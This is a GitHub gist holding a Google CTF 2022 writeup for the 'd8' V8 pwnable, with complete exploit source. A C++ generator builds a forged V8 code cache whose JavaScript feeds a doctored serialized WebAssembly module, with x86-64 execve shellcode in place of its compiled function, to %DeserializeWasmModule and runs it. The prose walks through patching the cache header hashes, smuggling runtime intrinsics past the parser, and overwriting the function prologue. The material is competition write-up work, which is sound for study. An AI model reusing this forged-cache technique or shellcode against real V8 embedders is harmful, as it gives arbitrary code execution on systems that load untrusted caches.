Skip to content

Instantly share code, notes, and snippets.

@Riatre
Created July 18, 2022 20:33
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Riatre/83d5fdb970946c8e185c5e1b2b842b1b to your computer and use it in GitHub Desktop.
Save Riatre/83d5fdb970946c8e185c5e1b2b842b1b to your computer and use it in GitHub Desktop.
Google CTF 2022 Pwnable d8 Writeup
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "include/libplatform/libplatform.h"
#include "include/v8-context.h"
#include "include/v8-initialization.h"
#include "include/v8-isolate.h"
#include "include/v8-local-handle.h"
#include "include/v8-primitive.h"
#include "include/v8-script.h"
#include "src/api/api-inl.h"
#include "src/base/platform/platform.h"
#include "src/codegen/compiler.h"
#include "src/execution/isolate-inl.h"
#include "src/flags/flags.h"
#include "src/objects/instance-type.h"
#include "src/objects/shared-function-info.h"
#include "src/roots/roots.h"
#include "src/snapshot/code-serializer.h"
#include "test/cctest/cctest.h"
// JavaScript payload that main() compiles into a V8 code cache.
//
// The script relies on V8 native-syntax intrinsics (%DeserializeWasmModule,
// %DebugPrint, %GlobalPrint), so it presumably only parses when the generator
// is run with --allow-natives-syntax -- TODO confirm against the build used.
//
// Contents of the script:
//   * wasm_code - the wire bytes of a small WebAssembly module that exports
//                 "memory" and "thefunc".
//   * the block commented out inside the script - the snippet that was used
//                 to dump a serialized module via %SerializeWasmModule.
//   * hack      - a serialized WASM module blob handed to
//                 %DeserializeWasmModule together with wasm_code; per the
//                 accompanying writeup its native code has been replaced with
//                 shellcode.
// The script then instantiates the deserialized module and calls the exported
// function "thefunc" with BigInt(1).
//
// NOTE: everything between R"( and )" is runtime data; do not reformat it.
const char* kJavaScriptCode = R"(
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,134,128,128,128,0,1,96,1,126,1,126,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,148,128,128,128,0,2,6,109,101,109,111,114,121,2,0,7,116,104,101,102,117,110,99,0,0,10,188,128,128,128,0,1,182,128,128,128,0,0,2,64,32,0,80,13,0,3,64,32,0,66,3,126,66,223,190,253,250,245,235,215,175,223,0,124,66,4,127,66,129,129,130,132,136,144,160,192,128,127,124,34,0,66,0,82,13,0,11,11,66,0,11]);
/*var mod = new WebAssembly.Module(wasm_code);
var inst = new WebAssembly.Instance(mod);
var func = inst.exports.thefunc;
%WasmTierUpFunction(inst, 0);
let serialized = %SerializeWasmModule(mod);
let hey = new Uint8Array(serialized);
for (let i = 0; i < serialized.byteLength; i++) {
%GlobalPrint("" + hey[i] + "\n");
}*/
let hack = new Uint8Array([96, 5, 222, 192, 74, 82, 180, 193, 255, 15, 0, 0, 213, 34, 201, 118, 192, 0, 0, 0, 0, 0, 0, 0, 4, 188, 0, 0, 0, 176, 0, 0, 0, 188, 0, 0, 0, 188, 0, 0, 0, 188, 0, 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 192, 0, 0, 0, 3, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 85, 106, 1, 254, 12, 36, 72, 184, 47, 99, 97, 116, 102, 108, 97, 103, 80, 72, 137, 231, 49, 210, 49, 246, 106, 59, 88, 15, 5, 49, 246, 86, 106, 8, 94, 72, 1, 230, 86, 72, 137, 230, 49, 210, 106, 59, 88, 15, 5, 0, 233, 12, 0, 0, 0, 102, 15, 31, 132, 0, 0, 0, 0, 0, 72, 139, 194, 72, 59, 35, 15, 134, 57, 0, 0, 0, 72, 107, 208, 3, 72, 3, 209, 72, 139, 194, 72, 153, 72, 247, 254, 72, 3, 199, 15, 132, 26, 0, 0, 0, 72, 107, 208, 3, 76, 139, 193, 76, 3, 194, 73, 139, 192, 72, 153, 72, 247, 254, 72, 139, 215, 72, 3, 208, 117, 194, 51, 192, 72, 139, 229, 93, 195, 72, 137, 69, 232, 72, 137, 93, 224, 232, 41, 0, 0, 0, 72, 139, 61, 140, 255, 255, 255, 190, 4, 0, 0, 0, 72, 139, 13, 118, 255, 255, 255, 72, 139, 69, 232, 72, 139, 93, 224, 235, 157, 144, 1, 0, 0, 0, 16, 4, 0, 0, 146, 0, 204, 204, 0,0, 0, 0, 58, 2, 87, 141, 2, 36]);
let deserialized = %DeserializeWasmModule(hack.buffer, wasm_code);
%DebugPrint(deserialized);
let new_inst = new WebAssembly.Instance(deserialized);
let new_func = new_inst.exports.thefunc;
%GlobalPrint("Deserialized func return " + new_func(BigInt(1)) + "\n");
)";
int main(int argc, char* argv[]) {
v8::internal::FlagList::SetFlagsFromCommandLine(&argc, argv, true);
v8::V8::InitializeICUDefaultLocation(argv[0]);
v8::V8::InitializeExternalStartupData(argv[0]);
std::unique_ptr<v8::Platform> platform = v8::platform::NewDefaultPlatform();
v8::V8::InitializePlatform(platform.get());
v8::V8::Initialize();
v8::Isolate::CreateParams create_params;
create_params.array_buffer_allocator =
v8::ArrayBuffer::Allocator::NewDefaultAllocator();
v8::Isolate* isolate = v8::Isolate::New(create_params);
{
v8::Isolate::Scope isolate_scope(isolate);
v8::HandleScope handle_scope(isolate);
v8::Local<v8::Context> context = v8::Context::New(isolate);
v8::Context::Scope context_scope(context);
v8::Local<v8::String> source_string = v8_str(kJavaScriptCode);
v8::ScriptCompiler::Source source(source_string);
v8::Local<v8::UnboundScript> script =
v8::ScriptCompiler::CompileUnboundScript(
isolate, &source, v8::ScriptCompiler::kEagerCompile)
.ToLocalChecked();
auto cache = v8::ScriptCompiler::CreateCodeCache(script);
printf("Data: %p, Length: %d\n", cache->data, cache->length);
FILE* fp = fopen("/home/riatre/ctf-archive/googlectf22/pwn/d8/test.bin", "w");
fwrite(cache->data, 1, cache->length, fp);
fclose(fp);
}
isolate->Dispose();
v8::V8::Dispose();
v8::V8::DisposePlatform();
delete create_params.array_buffer_allocator;
return 0;
}

d8

Summary

d8 is a pwnable challenge from Google CTF 2022. The challenge runs on a reasonably recent version of the V8 JavaScript engine and asks players to prepare a serialized "code cache", which, upon load & execution, should be able to run arbitrary code (execve("/catflag", nullptr, nullptr) in this case). We ended up solving it in an unintended way which does not involve any form of memory corruption. In this writeup we document how we approached the challenge, explored various possible exploitation paths and how we finally pwned it.

tl;dr V8 serialized code cache is a "trusted" asset, executing malicious one gives easy RCE.

Probe

The challenge description tells us that it was built on V8 commit 581a5ef7be2d340b4a0795a3b481ff7668e2252a. Looking at GitHub, we realized that it is basically V8 10.4.43, released on May 22 2022. While there were certainly exploitable bugs reported after May 22, none of them were public during the CTF, and we didn't really believe that this was simply a 1-day challenge.

After a closer look at the v8.patch used to build the challenge, we found out it also didn't introduce any new bug to V8. It merely added a new v8_executable, the corresponding BUILD rules, and flipped the flag wasm_write_protect_code_memory to false. The new executable, serving as the challenge entry, does seem interesting. It constructs a v8::ScriptCompiler::CachedData with arbitrary user input, and passes it as code_cache, along with an empty source text, to v8::ScriptCompiler::Source. It then compiles and runs the source with the flag v8::ScriptCompiler::kConsumeCodeCache. In other words, the challenge allows us to load and execute arbitrary (potentially forged) code cache.

The documentation shows that code cache is a serialized blob of parsed or compiled JavaScript code. This is fishy: given that it is named a "cache", I doubt it was hardened against malicious inputs. 🤔

Looking up v8::ScriptCompiler::Source on cs.chromium.org/ leads to an interesting comment:

  class Source {
   public:
    // Source takes ownership of both CachedData and CodeCacheConsumeTask.
    // The caller *must* ensure that the cached data is from a trusted source.
    V8_INLINE Source(Local<String> source_string, const ScriptOrigin& origin,
                     CachedData* cached_data = nullptr,
                     ConsumeCodeCacheTask* consume_cache_task = nullptr);

It emphasizes that the cached data must be from a trusted source, hinting that "loading code cache from user input" is, indeed, insecure.

Producing Code Cache

We still don't know how exactly we can exploit this, but first, let's try to produce a code cache. We built a debug build of V8 with the challenge patch applied along with an extra executable:

/* #include <...> */
const char* kJavaScriptCode = R"(
while(1);
)";

// Abridged generator: compiles kJavaScriptCode eagerly into an unbound script,
// serializes it into a code cache and dumps the raw cache bytes to test.bin.
// V8 setup, scope guards and teardown are elided in this excerpt.
int main(int argc, char* argv[]) {
  // Forward command-line arguments to V8's flag parser.
  v8::internal::FlagList::SetFlagsFromCommandLine(&argc, argv, true);

  /* V8 initialization omitted */
  {
    /* scope guards omitted */

    // Wrap the JavaScript text in a ScriptCompiler::Source.
    v8::Local<v8::String> source_string = v8_str(kJavaScriptCode);
    v8::ScriptCompiler::Source source(source_string);

    // Compile with kEagerCompile, without binding the script to a context.
    v8::Local<v8::UnboundScript> script =
        v8::ScriptCompiler::CompileUnboundScript(
            isolate, &source, v8::ScriptCompiler::kEagerCompile)
            .ToLocalChecked();
    // Serialize the compiled script; cache->data / cache->length describe the
    // blob that is written out below.
    auto cache = v8::ScriptCompiler::CreateCodeCache(script);
    // NOTE(review): the fopen() result is not checked in this excerpt.
    FILE* fp = fopen("test.bin", "w");
    fwrite(cache->data, 1, cache->length, fp);
    fclose(fp);
  }
  /* V8 finalization omitted */
  return 0;
}

However, the challenge binary rejected the blob. After some debugging we realized that there are a few sanity checks on the blob header, mainly about source_hash and flags_hash. source_hash is just len(source_js_code) (Hi PHP), and flags_hash is computed from the runtime command line flags, which are constant in the challenge binary. With this we can simply patch V8 to write the expected values:

diff --git a/src/snapshot/code-serializer.cc b/src/snapshot/code-serializer.cc
index ff416cbe020..3b84bf84261 100644
--- a/src/snapshot/code-serializer.cc
+++ b/src/snapshot/code-serializer.cc
@@ -592,8 +597,14 @@ SerializedCodeData::SerializedCodeData(const std::vector<byte>* payload,
   // Set header values.
   SetMagicNumber();
   SetHeaderValue(kVersionHashOffset, Version::Hash());
-  SetHeaderValue(kSourceHashOffset, cs->source_hash());
-  SetHeaderValue(kFlagHashOffset, FlagList::Hash());
+  if (FLAG_trace_serializer) {
+    SetHeaderValue(kSourceHashOffset, 0); // empty source
+    SetHeaderValue(kFlagHashOffset, 0x76c922d5); // release default flag hash
+  } else {
+    SetHeaderValue(kSourceHashOffset, cs->source_hash());
+    SetHeaderValue(kFlagHashOffset, FlagList::Hash());
+  }
   SetHeaderValue(kPayloadLengthOffset, static_cast<uint32_t>(payload->size()));

   // Zero out any padding in the header.

(we reused the flag --trace_serializer because, well, introducing a new flag in V8 requires a full rebuild and is painfully slow without a build farm)

Now the challenge binary no longer prints out "Code is rejected." Let's see where our entry point into the weird machine is.

Code Cache Internal

What actually is V8 code cache and more importantly, what's in the serialized blob? Reading the code, it quickly becomes clear that v8::ScriptCompiler tries to deserialize a SharedFunctionInfo from the code cache. This is exciting: SharedFunctionInfo contains everything juicy about a function or top-level code in V8: its bytecode, associated data and even JIT-compiled native code (both baseline and TurboFan). If we can convince V8 to deserialize a SharedFunctionInfo with native code, we could have an easy win. Let's try to force a baseline compilation of the top-level code:

script->BindToCurrentContext()->Run(context).ToLocalChecked();
i::Handle<i::SharedFunctionInfo> sfi =
    i::Handle<i::SharedFunctionInfo>::cast(v8::Utils::OpenHandle(*script));
v8::internal::IsCompiledScope is_compiled_scope(
    *sfi, reinterpret_cast<v8::internal::Isolate*>(isolate));
v8::internal::Compiler::CompileSharedWithBaseline(
    reinterpret_cast<v8::internal::Isolate*>(isolate), sfi,
    v8::internal::Compiler::CLEAR_EXCEPTION, &is_compiled_scope);

Unfortunately, the serialized blob still does not contain any native-amd64-ish code, and --trace-serializer confirmed that no v8::internal::Code objects are serialized. In fact, it looks exactly the same as before. Diving into V8 internals, we found that it deliberately does not serialize native Code objects for code cache.

During the game we spent a few hours changing V8 to properly serialize baseline code objects in code cache. In the end it didn't work - we hit a CHECK() blocking any v8::internal::Code objects from being deserialized as code cache in ObjectDeserializer::Deserialize.

Bytecode & Intrinsics

Okay, it looks like the naive idea failed. Let's see how much havoc we can wreak with broken bytecodes. A cursory look confirmed that there is no real bounds checking in the bytecode interpreter (only DCHECK). However, when going over the opcode list and looking for powerful primitives, we found another interesting feature: there is an opcode called CallRuntime!

It turns out the "intrinsics" enabled with the --allow-natives-syntax flag, i.e. %DebugPrint() etc., are actually runtime functions, and are dispatched with the CallRuntime instruction. Changing the kJavaScriptCode above to %GlobalPrint("Hooray World\n");, we can confirm that the allow_natives_syntax flag check only happens during parsing. Once the intrinsics are compiled in, the challenge binary happily runs the %GlobalPrint() without --allow-natives-syntax.

WASM Code Cache

Skimming over the runtime function list, we found a promising target: [DeserializeWasmModule](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/runtime/runtime.h;l=630?q=DeserializeWasmModule&ss=chromium%2Fchromium%2Fsrc&start=11). It was mainly used to test the WASM code caching. The blog post states that it is mainly used for caching compiled native code, so let's see what's inside 🤔

With the following snippet:

var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,134,128,128,128,0,1,96,1,126,1,126,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,148,128,128,128,0,2,6,109,101,109,111,114,121,2,0,7,116,104,101,102,117,110,99,0,0,10,188,128,128,128,0,1,182,128,128,128,0,0,2,64,32,0,80,13,0,3,64,32,0,66,3,126,66,223,190,253,250,245,235,215,175,223,0,124,66,4,127,66,129,129,130,132,136,144,160,192,128,127,124,34,0,66,0,82,13,0,11,11,66,0,11]);

var mod = new WebAssembly.Module(wasm_code);
var inst = new WebAssembly.Instance(mod);
var func = inst.exports.thefunc;
%WasmTierUpFunction(inst, 0);
let serialized = %SerializeWasmModule(mod);
let hey = new Uint8Array(serialized);
for (let i = 0; i < serialized.byteLength; i++) {
  %GlobalPrint("" + hey[i] + "\n");
}

We obtained a serialized WASM module dump:

00000000  60 05 de c0  4a 52 b4 c1  ff 0f 00 00  d5 22 c9 76  │`···│JR··│····│·"·v│
00000010  c0 00 00 00  00 00 00 00  04 bc 00 00  00 b0 00 00  │····│····│····│····│
00000020  00 bc 00 00  00 bc 00 00  00 bc 00 00  00 06 00 00  │····│····│····│····│
00000030  00 00 00 00  00 c0 00 00  00 03 00 00  00 03 00 00  │····│····│····│····│
00000040  00 00 00 00  00 00 00 00  00 02 55 48  89 e5 6a 08  │····│····│··UH│··j·│
00000050  56 48 83 ec  10 48 83 f8  00 0f 84 69  00 00 00 48  │VH··│·H··│···i│···H│
00000060  8b 5e 27 48  b9 5f 5f 5f  5f 5f 5f 5f  5f 48 bf 81  │·^'H│·___│____│_H··│
00000070  80 80 80 80  80 80 80 be  04 00 00 00  e9 0c 00 00  │····│····│····│····│
00000080  00 66 0f 1f  84 00 00 00  00 00 48 8b  c2 48 3b 23  │·f··│····│··H·│·H;#│
00000090  0f 86 39 00  00 00 48 6b  d0 03 48 03  d1 48 8b c2  │··9·│··Hk│··H·│·H··│
000000a0  48 99 48 f7  fe 48 03 c7  0f 84 1a 00  00 00 48 6b  │H·H·│·H··│····│··Hk│
000000b0  d0 03 4c 8b  c1 4c 03 c2  49 8b c0 48  99 48 f7 fe  │··L·│·L··│I··H│·H··│
000000c0  48 8b d7 48  03 d0 75 c2  33 c0 48 8b  e5 5d c3 48  │H··H│··u·│3·H·│·]·H│
000000d0  89 45 e8 48  89 5d e0 e8  29 00 00 00  48 8b 3d 8c  │·E·H│·]··│)···│H·=·│
000000e0  ff ff ff be  04 00 00 00  48 8b 0d 76  ff ff ff 48  │····│····│H··v│···H│
000000f0  8b 45 e8 48  8b 5d e0 eb  9d 90 01 00  00 00 10 04  │·E·H│·]··│····│····│
00000100  00 00 92 00  cc cc 00 00  00 00 3a 02  57 8d 02 24  │····│····│··:·│W··$│

Spotted the 554889e5? That's push rbp; mov rbp, rsp, the usual x86_64 function prologue. After overwriting it with an int 3 and calling %DeserializeWasmModule followed by the WASM function, we were greeted by a nice trace trap message. Fill in our shellcode and voila!

See another file in the gist for full exploit.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment